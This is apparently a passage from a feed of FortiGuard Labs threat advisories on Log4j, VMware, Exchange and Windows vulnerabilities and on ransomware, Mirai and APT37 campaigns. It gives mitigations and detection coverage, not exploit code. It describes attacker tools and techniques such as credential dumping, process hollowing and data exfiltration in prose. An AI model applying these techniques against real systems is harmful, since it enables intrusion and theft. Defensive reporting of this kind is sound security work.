(CVE-2016-6277)TrueOnline.ZyXEL.P660HN.V1.Unauthenticated.Command.Injection (CVE-2017-18368)NETGEAR.ping_IPAddr.HTTP.Post.Command.Injection (CVE-2017-6077)NETGEAR.DGN.DnsLookUp.Remote.Command.Injection (CVE-2017-6334)XiongMai.uc-httpd.Buffer.Overflow (CVE-2018-10088)Dasan.GPON.Remote.Code.Execution (CVE-2018-10561, Dasan.GPON.Remote.Code.Execution)Comtrend.VR-3033.Remote.Command.Injection (CVE-2020-10173)Tenda.AC15.AC1900.Authenticated.Remote.Command.Injection (CVE-2020-10987)DrayTek.Vigor.Router.Web.Management.Page.Command.Injection (CVE-2020-8515)ZyXEL.NAS.Pre-authentication.OS.Command.Injection (CVE-2020-9054)All network IOCs are blocked by the WebFiltering client.FortiGuard Labs is currently investigating for additional coverage. This Threat Signal will be updated when new protection becomes available. | Malware Threat | ||
|
2022-01-26 21:58:14 | Critical VMware vCenter Server vulnerability (CVE-2021-22005) being exploited in the wild (lien direct) | FortiGuard Labs is aware that VMware disclosed a critical vulnerability (CVE-2021-22005) on September 21st, 2021 that affects vCenter Server versions 6.7 and 7.0. A malicious attacker with network access to port 443 on vCenter Server can exploit the vulnerability and can execute code on vCenter Server upon successful exploitation. The VMware advisory was updated on September 24th that the vulnerability is being exploited in the wild. In addition, exploit code is publicly available.Why is this Significant?VMware has one of the highest market shares in the server virtualization market so the vulnerability can have widespread affect. Also, some public reports indicate that CVE-2021-22005 is being exploited in the wild. With exploit code being publicly available, more attackers are expected to leverage the security bug. Because of the potential impact the vulnerability has in the field, CISA released an advisory on September 24th, 2021.What are the Details of the Vulnerability?Details of the vulnerability have not been disclosed by VMware.Has VMware Released an Advisory for CVE-2021-22005?Yes, the vendor released a cumulative advisory on September 21st, 2021. See the Appendix for a link to VMSA-2021-0020.1. The vendor also released a supplemental blog post and an advisory. See the Appendix to a link to "VMSA-2021-0020: What You Need to Know" and "VMSA-2021-0020: Questions & Answers".Has the Vendor Released a Patch?Yes. VMware released a patch on September 21st, 2021.Any Mitigation and or Workarounds?VMware provided workarounds in a blog. See the Appendix to a link to "Workaround Instructions for CVE-2021-22005 (85717)".What is The Status of Coverage?FortiGuard Labs is investigating for IPS protection. This Threat Signal will be updated with protection information as it becomes available. | Vulnerability Threat | ||
|
2022-01-12 18:27:37 | Wormable Windows Vulnerability (CVE-2022-21907) Patched by Microsoft (lien direct) | FortiGuard Labs is aware that a total of 96 vulnerabilities were patched by Microsoft on January 11th, 2022 as part of regular MS Patch Tuesday. In those vulnerabilities, CVE-2022-21907 (HTTP Protocol Stack Remote Code Execution Vulnerability) is one of the nine vulnerabilities that are rated critical. In the advisory, Microsoft warned that CVE-2022-21907 is wormable and "recommends prioritizing the patching of affected servers".Why is this Significant?This is significant because CVE-2022-21907 is considered wormable as such malware can exploit the vulnerability to self-propagate without any user interaction nor elevated privilege. CVE-2022-21907 targets the HTTP trailer support feature that is enabled by default in various Windows 10 and 11 versions, as well as Windows Server 2022. The vulnerability also has a CVSS score of 9.8 (max score 10).What is CVE-2022-21907?CVE-2022-21907 is a remote code execution vulnerability in HTTP protocol stack (http.sys). HTTP.sys is a legitimate Windows component that is responsible for parsing HTTP requests. An unauthenticated attacker could craft and send a malicous packet to an affected server utilizing the HTTP Protocol Stack (http.sys) to process packets, which leads to remote code execution.Which Versions of Windows are Vulnerable?Per the Microsoft advisory, the following Windows versions are vulnerable:Windows Server 2019Windows Server 2022Windows 10Windows 11Note that the HTTP trailer support feature is inactive by default in Windows Server 2019 and Windows 10 version 1809. As such, they are not vulnerable unless the feature is enabled.Is the Vulnerability Exploited in the Wild?FortiGuard Labs is not aware of CVE-2022-21907 being exploited in the wild at the time of this writing.Has the Vendor Released a Fix?Yes. Microsoft released a fix for CVE-2022-21907 on January 11th, 2022 as part of regular Patch Tuesday.What is the Status of Coverage?FortiGuard Labs is currently investigating protection and will update this Threat Signal once coverage information becomes available.Any Mitigation?Microsoft provided the following mitigation in the advisory:In Windows Server 2019 and Windows 10 version 1809, the the HTTP Trailer Support feature that contains the vulnerability is not active by default. The following registry key must be configured to introduce the vulnerable condition:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters\"EnableTrailerSupport"=dword:00000001This mitigation does not apply to the other affected versions. | Malware Vulnerability Threat Patching Guideline | ||
|
2022-01-07 18:18:27 | Remote Code Execution in H2 Console JNDI - (CVE-2021-42392) (lien direct) | FortiGuard Labs is aware of newly discovered vulnerability in H2 Database software. The vulnerability is an unauthenticated remote code execution in the H2 database console and similar to Log4j, it is JNDI-based and has an exploit vector similar to it. This vulnerability has been assigned CVE-2021-42392 and was found by security researchers at JFrog. What is H2 Database?H2 is a relational database management system written in Java and is open source. It can be embedded in Java applications or run in client-server mode and data does not need to be stored on disk. What are the Technical Details?In a nutshell, the vector is similar to Log4Shell, where several code paths in the H2 database framework pass unfiltered attacker controlled URLs to the javax.naming.Context.lookup function, which allows for remote codebase loading (remote code execution). The H2 database contains a web based console which listens for connections at http://localhost:8082. The console will contain parameters that are passed by JdbcUtils.getConnection and a malicious URL controlled by the attacker.This vulnerability affects systems with H2 console installed. The vulnerability does not affect machines with H2 database installed in standalone mode. The vulnerability (by default) looks for connections from localhost, or a non remote connection. However, this vulnerability can be modified to listen for remote connections, therefore allowing susceptibility to remote code execution attacks. How Severe is This? Is it Similar to Log4j?According to the report, this is not believed to be as severe as Log4j, because of several factors. The first factor requires H2 console to be present on the system as both the console and database are able to operate independently of each other. Second, the default configuration of accepting connections from localhost must be edited to listen for external connections, which means that default installations are safe to begin with. What is the CVSS score?At this time, details are not available. What Mitigation Steps are Available?FortiGuard Labs recommends that users of H2 database software upgrade to version 2.0.206 immediately. If this is not possible, placing a vulnerable instance behind a firewall or removing access from the public facing internet is suggested. For further details on mitigation, please refer to the JFrog blog "The JNDI Strikes Back - Unauthenticated RCE in H2 Database Console" located in the APPENDIX. What is the Status of Coverage?FortiGuard Labs is currently assessing an IPS signature to address CVE-2021-42392. This Threat Signal will be updated once a relevant update is available. | Vulnerability Threat | ||
|
2021-12-28 19:12:16 | Log4j 2.17.1 Released for CVE-2021-44832 (lien direct) | FortiGuard Labs is aware of a newly disclosed remote code execution vulnerability affecting Log4j. Assigned CVE-2021-44832, this vulnerability allows for a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code.There has been confusion on Twitter as to whether this is actually a remote code execution (RCE) or arbitrary code execution (ACE) vulnerability. Researcher Yaniv Naziry (@YNizry) initially stated today that a new RCE vulnerability related to Log4j is to be announced, and later retracted their initial statement confirming that it is indeed arbitrary code execution and not remote code execution. Compounding matters, Apache classifies CVE-2021-44832 as a remote code execution vulnerability. In the writeup for CVE-2021-44832, Apache states that the attacker needs permission to "modify the logging configuration file" to successfully exploit this vulnerability which is not indicative of an RCE. CVE-2021-44832 is fixed in Log4j 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).What is Arbitary Code Execution and Remote Code Execution?Arbitrary code execution (ACE) results from a flaw in software or hardware that allows for an attacker to target a specific machine or process to run code of their choice. Remote Code Execution (RCE) allows for an attacker to arbitrarily execute code remotely on a wide area network, such as the Internet.What Versions of Log4J are Affected?All versions from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4.What is the CVSS Score?6.6 (MODERATE) What is the Status of Coverage?Analysis on this new vulnerability is underway to determine coverage feasibility. We will update this threat signal when updates are available.What Mitigation is Suggested?According to Apache, the following Mitigation is available:Log4j 1.x mitigationLog4j 1.x is not impacted by this vulnerability.Log4j 2.x mitigationUpgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).In prior releases confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java. Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability. Also note that Apache Log4j is the only Logging Services subproject affected by this vulnerability. Other projects like Log4net and Log4cxx are not impacted by this. | Vulnerability Threat | ||
|
2021-12-27 17:29:05 | Meet Rook Ransomware (lien direct) | FortiGuard Labs is aware of a recently reported ransomware "Rook". According to a publicly available report, Rook appears to be based on the leaked Babuk ransomware source code. One of the Rook's victims is a financial institution in Kazakhstan which the ransomware gang stole more than 1,000 GB worth of data.Why is this Significant?This is significant because Rook is one of the recent ransomware gangs that joined the already crowded ransomware landscape. The ransomware reportedly infected a financial institution in Kazakhstan and stole more than 1,000 GB worth of data.What is Rook Ransomware?Rook ransomware is reported to be based on the leaked Babuk source code and was first discovered in the wild at the end of November 2021. Files encrypted by Rook ransomware typically has ".rook" file extension, however the earlier version of Rook is said to use ".tower" file extension instead. The ransomware leaves a ransom note in HowToRestoreYourFiles.txt, which the victim is instructed to contact the Rook gang by either accessing the Rook's Tor web site or emailing the threat actor. The ransom note warns the victim that the private key to decrypt the encrypted files will be destroyed if a security vendor or law enforcement agency joins the negotiation.How is Rook Ransomware Delivered?Rook ransomware is reported to have been delivered via Cobalt Strike or untrustworthy Torrent downloads.What is the Status of Coverage?FortiGuard Labs provide the following AV coverage against Rook ransomware:W32/Filecoder_Sodinokibi.A!tr.ransom | Ransomware Threat | ||
|
2021-12-27 17:28:38 | Mortar Loader: New tool for Process Hollowing written in Pascal (lien direct) | Mortar Loader is a new process hollowing tool that can be leveraged by threat actors. Process Hollowing is a well-known evasion technique used by adversaries to defeat detection and prevention by security products. Mortar Loader is implemented as an open-source tool for red teamers in the Pascal programming language.A loader is malicious code or program used for loading the actual payload on the infected machine.What is Process Hollowing?Process Hollowing is a method of executing arbitrary code in the address space of a separate live process. It is commonly performed by creating a process in a suspended state then unmapping its memory, which can then be replaced with malicious code. Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.How does Mortar Loader work?Mortar has two components, the payload encryptor and the loader itself.The encryptor runs on the attacker's machine to prepare the selected PE payload. It encrypts it with the blowfish symmetric encryption algorithm and encodes the ciphertext with base64.The Loader uses memory stream objects to reverse the operations and decode and decrypt the payload using a hardcoded key. It can be compiled as a standalone executable or a DLL. The plaintext payload is executed using the vanilla Process Hollowing technique without writing it to a file on diskWhat is the Status of Coverage?FortiEDR detects and blocks payloads executed by Mortar Loader out-of-the-box as it detects Process Hollowing from the operating system's perspective.Depending on the enabled set of policies, FortiEDR can block creation of such malicious processes (pre-execution) or malicious operations performed by the payload (post-infection). | Tool Threat | ||
|
2021-12-20 19:11:01 | Mirai Malware that Allegedly Propagates Using Log4Shell Spotted in the Wild (lien direct) | FortiGuard Labs is aware of a new Mirai Linux variant that spreads using CVE-2021-44228 (Log4Shell). This is possibly the first Mirai variant equipped with Log4Shell exploit code incorporated alongside a Mirai variant, since the vulnerability came to light on December 9th 2021.This sample was discovered by security researcher @1ZRR4H on Twitter.How does this Mirai Variant Work? Is this a Worm?The Mirai variant exploits CVE-2021-44228 and CVE-2017-17215 (Huawei HG532 Remote Code Execution). If the exploit is successful, the targeted machine is redirected to a LDAP server to pass the next stage payload (varies) to the victim machine.Furthermore, chatter on OSINT channels have discussed whether or not this is a "worm." Our findings reveal that like a worm, it has the capability to propagate. But what makes it not a worm in the traditional sense is that all instructions are under control of the botmaster and it relies on an external resource for propagation. The botmaster can also start/stop various actions, unlike a worm. In conclusion, our analysis concludes that this Mirai variant is equipped with Log4Shell exploit code and Huawei H532 exploit code and does not classify as a worm.What is Mirai malware?Mirai malware is a Linux IoT malware that makes infected machines join a zombie network that is used for Distributed Denial of Service (DDoS) attacks. The first report of Mirai goes back to at least August 2016. Since the source code of Mirai was leaked publicly, there have been numerous threat actors and campaigns incorporating Mirai and related variants in the wild.FortiGuard Labs previously published several blogs on Mirai IoT malware. Please refer to the APPENDIX for links to related blogs.Why is this Significant?This sample was reported to be one of the first worm-like samples exploiting Log4Shell. However, our analysis has concluded that this specific sample does not qualify nor can it be classified as a worm.What is the Status of Coverage?FortiGuard Labs provide the following AV coverage against this Mirai malware variant:ELF/Mirai.VI!trFortiGuard Labs provides the following IPS coverage against CVE-2017-17215:Huawei.HG532.Remote.Code.ExecutionFor FortiEDR, all known samples have been added to our cloud intelligence and will be blocked if executed.All network IOCs are blocked by the WebFiltering client. | Malware Vulnerability Threat | ||
|
2021-12-20 06:10:10 | New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service (lien direct) | UPDATE December 17 2021: The Apache Software Foundation has changed Denial of Service to Remote Code Execution and has upgraded a CVSS score from 3.7 to 9.0 as such this Threat Signal has been updated accordingly along with protection information. What is the Vulnerability? (Updated on December 17th)This is a new vulnerability (CVE-2021-45046) discovered in Log4j, the same utility that last week announced a critical vulnerability known as Log4Shell (CVE-2021-44228). Successfully exploiting this new vulnerability would result in an information leak and remote code execution (RCE) in some environments and local code execution in all environments. Initially CVE-2021-45046 was identified as a Denial of Service vulnerability. The new vulnerability is tracked as CVE-2021-45046. The vulnerability was initially given a CVSS score of 3.7, however the score was upgraded to 9.0 as remote code execution and information leak could be achieved as a result of successful exploitation. Apache provides the following updated description in their advisory on December 16th: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments. FortiGuard Labs previously released Threat Signal for CVE-2021-44228 (Log4Shell). See the Appendix for a link to "Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228)". What Versions of Log4j are Affected?All versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 Has Apache Released a Fix for CVE-2021-45046?Yes. In response to the issue, Apache Log4j 2.16.0 was released for Java 8 and up and 2.12.2 for Java 7. What is the Status of Coverage? (Updated on December 17th)FortiGuard Labs provides the following AV coverage against CVE-2021-45046:Apache.Log4j.Error.Log.Remote.Code.Execution Any Suggested Mitigation?Apache provides the following mitigation in their advisory: Log4j 1.x mitigation: Log4j 1.x is not impacted by this vulnerability. Log4j 2.x mitigation: Implement one of the mitigation techniques below.Java 8 (or later) users should upgrade to release 2.16.0.Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability. | Vulnerability Threat | ||
|
2021-12-13 09:00:42 | Apache Log4J Remote Code Execution Vulnerability (CVE-2021-44228) (lien direct) | FortiGuard Labs is aware of a remote code execution vulnerability in Apache Log4j. Log4j is a Java based logging audit framework within Apache. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability where a remote attacker can leverage this vulnerability to take full control of a vulnerable machine.This vulnerability is also known as Log4shell and has the CVE assignment (CVE-2021-44228). FortiGuard Labs will be monitoring this issue for any further developments.What are the Technical Details?Apache Log4j2 versions 2.14.1 and below Java Naming and Directory Interface (JNDI) features do not protect against attacker controlled LDAP and other JNDI related endpoints. A remote code execution vulnerability exists where attacker controlled log messages or log message parameters are able to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.What Versions of Software are Affected?Apache Log4J versions 2.0-beta9 to 2.14.1 are affected.Is there a Patch or Security Update Available?Yes, moving to version 2.15.0 mitigates this issue. Further mitigation steps are available from Apache as well. Please refer to the "Apache Log4j Security Vulnerabilities" in the APPENDIX for details.What is the CVSS Score?10 (CRITICAL)What is Exactly Apache Log4j?According to Apache:Log4j is a tool to help the programmer output log statements to a variety of output targets. In case of problems with an application, it is helpful to enable logging so that the problem can be located. With log4j it is possible to enable logging at runtime without modifying the application binary. The log4j package is designed so that log statements can remain in shipped code without incurring a high performance cost. It follows that the speed of logging (or rather not logging) is capital.At the same time, log output can be so voluminous that it quickly becomes overwhelming. One of the distinctive features of log4j is the notion of hierarchical loggers. Using loggers it is possible to selectively control which log statements are output at arbitrary granularity.What is the Status of Protections?FortiGuard Labs has IPS coverage in place for this issue as (version 19.215):Apache.Log4j.Error.Log.Remote.Code.ExecutionWhile we urge customers to patch vulnerable systems as soon as possible, FortiEDR monitors and protects against payloads delivered by exploitation of the vulnerability. The picture below demonstrates blocking of a PowerShell payload used as part of CVE-2021-44228 exploitation:Detection of exploitable systems is possible via FortiEDR threat hunting by searching for loading of vulnerable log4j versions. This is an example of loading a vulnerable log4j library by a Apache Tomcat Server:Any Suggested Mitigation?According to Apache, the specific following mitigation steps are available:In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to "true." For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.classFortiGuard Labs recommends organizations affected by CVE-2021-44228 to update to the latest version of 2.15.0 immediately. Apache also recommends that users running versions 1.0 or lower install version 2.0 or higher as 1.0 has reached end of life in August 2015 for Log4j to obtain security updates. Binary patches are never provided and must be compiled. For further details, refer to the "Apache Log4j Security Vulnerabilities" in the APPENDIX.If this is not possible, various counter measures such as isolating machines behind a firewall or VPN that are public facing is recommended. | Tool Vulnerability Threat | ★★★★★ | |
|
2021-12-06 22:36:49 | Joint CyberSecurity Advisory on Attacks Exploiting Zoho ManageEngine ServiceDesk Plus Vulnerability (CVE-2021-44077) (lien direct) | FortiGuard Labs is aware of a recent joint advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) on APT actors actively exploiting a critical vulnerability in Zoho ManageEngine ServiceDesk Plus. Successfully exploiting the vulnerability (CVE-2021-44077) enables an attacker to compromise administrator credentials, propagate through the compromised network, and conduct cyber espionage.Why is this Significant?This is significant because the advisory was released due to active exploitation of the vulnerability being observed. Zoho, the vendor of ManageEngine ServiceDesk Plus, states in their advisory that "we are noticing exploits of this vulnerability, and we strongly urge all customers using ServiceDesk Plus (all editions) with versions 11305 and below to update to the latest version immediately".What Product and Versions are Vulnerable?The vulnerable product is all editions of ServiceDesk Plus. Vulnerable versions are all versions up to, and including, version 11305.What are the Technical Details of the Vulnerability?Not much information is currently available on the vulnerability other than the vulnerability is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.What is CVE Number and Severity Assigned to the Vulnerability?The vulnerability is assigned CVE-2021-44077 and is rated critical with CVSS score of 9.8.Which Industries are Targeted?According to the advisory, Critical Infrastructure Sector industries, including the healthcare, financial services, electronics and IT consulting industries are targeted by threat actors.What Malicious Activities Conducted by the Threat Actors were Observed?CISA provided the following Tactics, techniques and procedures (TTPs) for the observed activities:Writing webshells to disk for initial persistenceObfuscating and Deobfuscating/Decoding Files or InformationConducting further operations to dump user credentialsLiving off the land by only using signed Windows binaries for follow-on actionsAdding/deleting user accounts as neededStealing copies of the Active Directory database (NTDS.dit) or registry hivesUsing Windows Management Instrumentation (WMI) for remote executionDeleting files to remove indicators from the hostDiscovering domain accounts with the net Windows commandUsing Windows utilities to collect and archive files for exfiltrationUsing custom symmetric encryption for command and control (C2)Has the Vendor Patched the Vulnerability?Yes, Zoho released a patch on September 16, 2021.Has the Vendor Released an Advisory?Yes, the vendor released an advisory on September 16, 2021. Additional advisory was released on November 22, 2021. Links are in the Appendix.What is the Status of Coverage?FortiGuard Labs provides the following AV coverage against available files that were used in the attack: Java/Webshell.AD!trW64/Agent.BG!tr.pwsW32/Agent.CY!trTrojan.Win32.Agentb.kpbcHEUR:Trojan-Dropper.Win32.Agentb.genHEUR:Backdoor.Multi.MalGO.aBackdoor.Java.JSP.auTrojan.Win64.Agentb.azoTrojan.Win32.Agentb.kpbdTrojan.Win64.Agentb.azpAs for CVE-2021-44077, there is no sufficient information available for FortiGuard Labs to develop IPS protection. FortiGuard Labs will investigate protection once such information becomes available and will update this Threat Signal with protection. | Vulnerability Threat | ★★★★★ | |
|
2021-12-02 14:48:08 | Yanluowang Ransomware Used By a Threat Actor Previously Linked to Thieflock Ransomware (lien direct) | FortiGuard Labs is aware of a report that Yanluowang ransomware was recently used by a threat actor who previously employed Thieflock ransomware. According to Symantec, the threat actor focuses on organizations across multiple sectors in the United States. Yanluowang ransomware was first reported in October 2021. Yanluowang attackers demand ransomware from the victims and tell them not to contact law enforcement or ransomware negotiation firms. If they do, the attackers threaten the victim with distributed denial of service (DDoS) attacks as well as making phone calls to alert the victim's business partners. Why is this Significant? This is significant because the attacker, who mainly targets U.S. corporations, appears to have switched their arsenal from Thieflock ransomware to Yanluowang ransomware. Because of this, companies in the United States need to pay extra attention to the tools, tactics, and procedure (TTPs) that this attacker uses. What TTPs is the Attacker Known to Use?According to the report, the attacker uses the following tools:GrabFF: A tool to dump passwords from FirefoxGrabChrome: A tool to dump passwords from ChromeBrowserPassView: A tool to dump passwords from Web browsers such as Internet Explorer, Chrome, Safari, Firefox, and OperaKeeThief: A PowerShell script to copy the master key from KeePassCustomized versions of Secretsdump: Security Account Manager (SAM) credential-dumping toolsFileGrab: A tool to capture newly created files in Windows file systemsCobalt Strike Beacon: A tool that allows the attacker to perform command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement.ProxifierPE: A tool to proxy connections back to attacker's Command and Control server (C&C)ConnectWise: A remote desktop software that provides remote access to the attackerAdFind: A command-line Active Directory query toolSoftPerfect Network Scanner: A tool to discover hostnames and network servicesBazarLoader: A backdoor program that is used to deploy additional malware and steal confidential information from the compromised machine. The attacker typically downloads BazarLoader using PowerShell.The initial attack vector is unclear so suspicious emails must be handled with caution and the patches for products and software that are used in the company must be applied.What is Yanluowang Ransomware? Yanluowang ransomware is reported to perform the following actions:Terminates all hypervisor virtual machines (VMs) running on the compromised machineTerminates processes, such as SQL and back-up solution Veeam, that are listed in processes.txtEncrypts files on the victim's machine and appends the .yanluowang extension to themDrops a ransom noteIn the ransom note, Yanluowang attacker asks the victim to follow their rules including not to contact law enforcement or ransomware negotiation companies or else the attacker will launch distributed denial of service (DDoS) attacks against the victim and will make phone calls to the victim's employees and business partners. What is the Status of Protection?FortiGuard Labs provides the following AV coverage against Yanluowang ransomware:W32/Ylwransom.A!tr.ransom All network IOCs are blocked by the WebFiltering client. | Ransomware Malware Tool Threat | ★★ | |
|
2021-11-30 11:24:48 | Recent APT37 Activity and Chinotto, a Multi Platform Infostealer (lien direct) | FortiGuard Labs is aware of reports of recent activity from APT37. APT37 is a nation-state threat actor attributed to North Korea. The latest discovery by researchers at Kaspersky Labs has revealed a sophisticated, targeted attack that utilizes the stolen credentials from Facebook and email accounts belonging to an associate of the targeted victim.The victim was socially engineered and compelled into opening rar zipped attachments purporting to be from the trusted sender that contained a malicious Word document. The Word document is multi stage in design, and uses a malicious macro to initiate the first stage. The first stage detects the presence of AV software, and if AV is not present will initiate the second stage which is a shellcode that will download the final third stage payload.Ultimately, after several months of dwelling undetected on the infected system, the backdoor will then download the multiplatform infostealer, "Chinotto." Windows variants were sent via spearphishing emails and Android variants were sent via SMShing texts.What Operating Systems are Affected?Chinoto targets Windows and Android based operating systems.Is This Limited to Targeted Attacks?Yes.How Serious of an Issue is This?Medium.What is APT37?APT37 (also known as GROUP123 and Scarcruft), attributed to North Korean threat actors, has been in operation for several years. During that time, APT37 has been attributed to the Adobe Flash zero-day attack (CVE-2018-4878) that targeted researchers based in South Korea who were performing research on North Korea. APT37 focuses on various organizations with an interest in North Korea.APT37 is famous for exploiting vulnerabilities in the Hangul Word Processor (HWP) which is commonly used in South Korea, especially by those in the government sector. Analysis suggests that this is a very detailed and sophisticated threat actor with an arsenal of malware and exploits at their disposal that targets various verticals and organizations with specially crafted campaigns. Other vectors besides the Adobe and Hangul vulnerabilities observed were the usage of Microsoft vulnerabilities as well, specifically CVE-2017-0199 (Microsoft Office UAC bypass) and CVE-2015-2545 (Microsoft Office Encapsulated PostScript (EPS). For further details on the exploitation of HWP documents and campaigns previously analyzed, please refer to our blog here.What is the Status of Coverage?FortiGuard Labs has AV coverage in place for publicly available samples as:VBA/Agent.AAK!trW32/PossibleThreatVBA/Agent.AF3C!trW32/Agent.ACDD!trPossibleThreat.MUPossibleThreat.PALLAS.HW32/FRS.VSNTGF20!trW32/Bsymem.MSJ!trAll network IOCs are blocked by the WebFiltering client.Any Other Suggested Mitigation?Due to the ease of disruption and the potential for damage to daily operations, reputation, and unwanted release of personally identifiable information (PII), etc. it is important to keep all AV and IPS signatures up to date.It is also important to ensure that all known vendor vulnerabilities are addressed and updated to protect from attackers having a foothold within a network. Attackers are well aware of the difficulty of patching and if it is determined that patching is not feasible at this time, an assessment should be conducted to determine risk.Also, as this campaign was sent via spearphishing and smsshing - organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing/smishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution. Since it has been reported that various phishing/spearphishing/smishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organizations' internal security department. Si | Malware Threat Patching Cloud | APT 37 | |
|
2021-11-23 17:18:27 | New Proof of Concept for CVE-2021-42321 Released (Microsoft Exchange Remote Code Execution Vulnerability) (lien direct) | FortiGuard Labs is aware of a new proof of concept that is leveraging CVE-2021-42321, a Microsoft Exchange Server Remote Code Execution Vulnerability. The proof of concept, released by security researcher @jannggg on Twitter is a post authentication remote code execution vulnerability. Patches for CVE-2021-42321 were released by Microsoft on November 9th, and the vulnerability is rated as IMPORTANT.What is the CVSS Score?This vulnerability has a CVSS Base Score of 8.8.Does the Attacker Need to be Authenticated?Yes. The attacker needs to be authenticated to the Microsoft Exchange Server.What Versions of Software are Affected?Microsoft has released security updates for for the following versions of Microsoft Exchange:Exchange Server 2013Exchange Server 2016Exchange Server 2019Is this Being Exploited In the Wild?Yes, Microsoft states that exploitation is limited to targeted attacks.Has the Vendor Issued a Patch?Yes, Microsoft issued a patch on November 9th. For further information on the vulnerability, including a link towards the available patches, please refer to the "Released: November 2021 Exchange Server Security Updates" link in the APPENDIX.Any Suggested Mitigation?As there have been reports of exploitation in the wild, including proof of concept code now available, it is imperative that patches are applied to affected systems as soon as possible. Also, to determine which machines may be behind on updates with respect to this latest patch, Microsoft has made available a PowerShell script that will help inventory potentially vulnerable machines on the network. Please refer to the "Exchange Server Health Checker" in the APPENDIX for this script.What is the the Status of Coverage?Coverage is being investigated at this time for feasibility. This threat signal will be updated once there is further information available. | Vulnerability Threat | ||
|
2021-11-16 13:16:47 | BlackMatter Uses New Custom Data Exfiltration Tool (lien direct) | FortiGuard Labs is aware that a BlackMatter ransomware affiliate started to use a new custom data exfiltration tool called "Exmatter". The tool is used to steal specific file types from predetermined directories and upload them to an attacker's server. This process happens before the ransomware is deployed to the victim's network.Why is this Significant?This is significant because Exmatter appears to target specific file types which the attacker thinks are valuable so it can steal them as quickly as possible. That allows the attacker to spend less time on the network before deploying the BlackMatter ransomware.What File Types is Exmatter Designed to Steal?According to security vendor Symantec, files with the following file extensions on the compromised machine are targeted by Exmatter: .doc.docx.xls.xlsx.pdf.msg.png.ppt.pptx.sda.sdm.sdw.csv.xlsm.zip.json.config.ts.cs.js.asp.pstAre There Multiple Versions of Exmatter?According to the security vendor, there are at least four versions of Exmatter that were used by a BlackMatter affiliate. Newer versions include additional file extensions to steal, as well as specific strings in file names that Exmatter excludes from the exfiltration targets. One directory target was shortened so that Exmatter can search for more files for exfiltration. Also SFTP server details used for uploading the stolen data were updated with Webdav to serve as a backup in case the SFTP transmission did not work.What is the Significance of the Updates Made to Exmatter?It is significant because the attacker used lessons learned from the networks of previous victims to update Exmatter to make data exfiltration more efficient and effective against future victims.What does FortiGuard Labs Know About BlackMatter Ransomware?BlackMatter ransomware is a fairly new Ransomware-as-a-Service (RaaS) and was discovered in late July 2021. The group posted ads on hacking forums recruiting affiliates and asking to buy access to compromised corporate networks to deploy ransomware. FortiGuard Labs has previously released two Threat Signals on BlackMatter ransomware. See the Appendix for a link to the Threat Signal, "Meet BlackMatter: Yet Another RaaS in the Wild" and to the Threat Signal, "Joint CyberSecurity Advisory on BlackMatter Ransomware (AA21-291A)."What is the Status of Coverage?FortiGuard Labs provides the following AV coverage against Exmatter:MSIL/Agent.7AAD!trW32/Crypt!trPossibleThreatAll Network IOC's related to this threat are blocked by the FortiGuard WebFiltering Client. | Ransomware Tool Threat |
To see everything:
Our RSS (filtrered)
